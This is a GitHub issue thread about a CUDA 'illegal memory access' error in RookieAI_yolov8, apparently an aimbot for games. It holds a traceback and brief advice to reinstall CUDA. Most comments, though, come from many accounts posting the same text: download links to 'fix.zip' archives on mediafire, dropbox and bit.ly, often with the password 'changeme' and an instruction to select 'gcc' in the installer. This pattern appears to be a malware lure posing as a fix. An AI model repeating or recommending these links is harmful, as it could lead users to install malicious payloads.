### ISSUE TITLE
关于RuntimeError: CUDA error: an illegal memory access was encountered的报错求助

### ISSUE THREAD

**Issue by NathanielChenZY** [Passer1072/RookieAI_yolov8#53]
你好，我在使用trt模型时之前是正常的，但是因为c盘爆红，我不小心清理了虚拟内存，导致帧数暴跌，甚至出些个位数后卡顿然后报错如下，我在网上寻找了办法，依然没有解决，我将虚拟内存开到40个g也没有解决，我的显卡是3070laptop，还请麻烦提供一下帮助，谢谢

[08/22/2024-14:10:44] [TRT] [E] IExecutionContext::executeV2: Error Code 1: Cuda Runtime (an illegal memory access was encountered)
Exception in thread Thread-2 (main_program_loop):
Traceback (most recent call last):
  File "D:\aimbot\anaconda\envs\cheater\Lib\threading.py", line 1045, in _bootstrap_inner
    self.run()
  File "D:\aimbot\anaconda\envs\cheater\Lib\threading.py", line 982, in run
    self._target(*self._args, **self._kwargs)
  File "D:\aimbot\RookieAI_yolov8\RookieAI_yolov8.py", line 2427, in main_program_loop
    results = model.predict(frame, save=False, conf=confidence, half=True, agnostic_nms=True, iou=0.7, classes=[
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\engine\model.py", line 563, in predict
    return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream)
                                                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\engine\predictor.py", line 168, in __call__
    return list(self.stream_inference(source, model, *args, **kwargs))  # merge list of Result into one
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\torch\utils\_contextlib.py", line 35, in generator_context
    response = gen.send(None)
               ^^^^^^^^^^^^^^
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\engine\predictor.py", line 253, in stream_inference
    with profilers[1]:
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\utils\ops.py", line 51, in __exit__
    self.dt = self.time() - self.start  # delta-time
              ^^^^^^^^^^^
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\utils\ops.py", line 61, in time
    torch.cuda.synchronize(self.device)
  File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\torch\cuda\__init__.py", line 801, in synchronize
    return torch._C._cuda_synchronize()
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: CUDA error: an illegal memory access was encountered
CUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect.
For debugging consider passing CUDA_LAUNCH_BLOCKING=1.
Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.

**Comment by molanp** [comment]
cuda无法访问指定内存，请尝试重新安装cuda或进行冷重启以及系统更新

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Passer1072** [comment]
> 你好，我在使用trt模型时之前是正常的，但是因为c盘爆红，我不小心清理了虚拟内存，导致帧数暴跌，甚至出些个位数后卡顿然后报错如下，我在网上寻找了办法，依然没有解决，我将虚拟内存开到40个g也没有解决，我的显卡是3070laptop，还请麻烦提供一下帮助，谢谢
> 
> [08/22/2024-14:10:44] [TRT] [E] IExecutionContext::executeV2: Error Code 1: Cuda Runtime (an illegal memory access was encountered) Exception in thread Thread-2 (main_program_loop): Traceback (most recent call last): File "D:\aimbot\anaconda\envs\cheater\Lib\threading.py", line 1045, in _bootstrap_inner self.run() File "D:\aimbot\anaconda\envs\cheater\Lib\threading.py", line 982, in run self._target(*self._args, **self._kwargs) File "D:\aimbot\RookieAI_yolov8\RookieAI_yolov8.py", line 2427, in main_program_loop results = model.predict(frame, save=False, conf=confidence, half=True, agnostic_nms=True, iou=0.7, classes=[ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\engine\model.py", line 563, in predict return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\engine\predictor.py", line 168, in **call** return list(self.stream_inference(source, model, *args, **kwargs)) # merge list of Result into one ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\torch\utils_contextlib.py", line 35, in generator_context response = gen.send(None) ^^^^^^^^^^^^^^ File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\engine\predictor.py", line 253, in stream_inference with profilers[1]: File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\utils\ops.py", line 51, in **exit** self.dt = self.time() - self.start # delta-time ^^^^^^^^^^^ File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\ultralytics\utils\ops.py", line 61, in time torch.cuda.synchronize(self.device) File "D:\aimbot\anaconda\envs\cheater\Lib\site-packages\torch\cuda__init__.py", line 801, in synchronize return torch._C._cuda_synchronize() ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ RuntimeError: CUDA error: an illegal memory access was encountered CUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect. For debugging consider passing CUDA_LAUNCH_BLOCKING=1. Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.

尝试重新安装CUDA环境，如果不起作用建议直接重装系统或采用双系统。

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
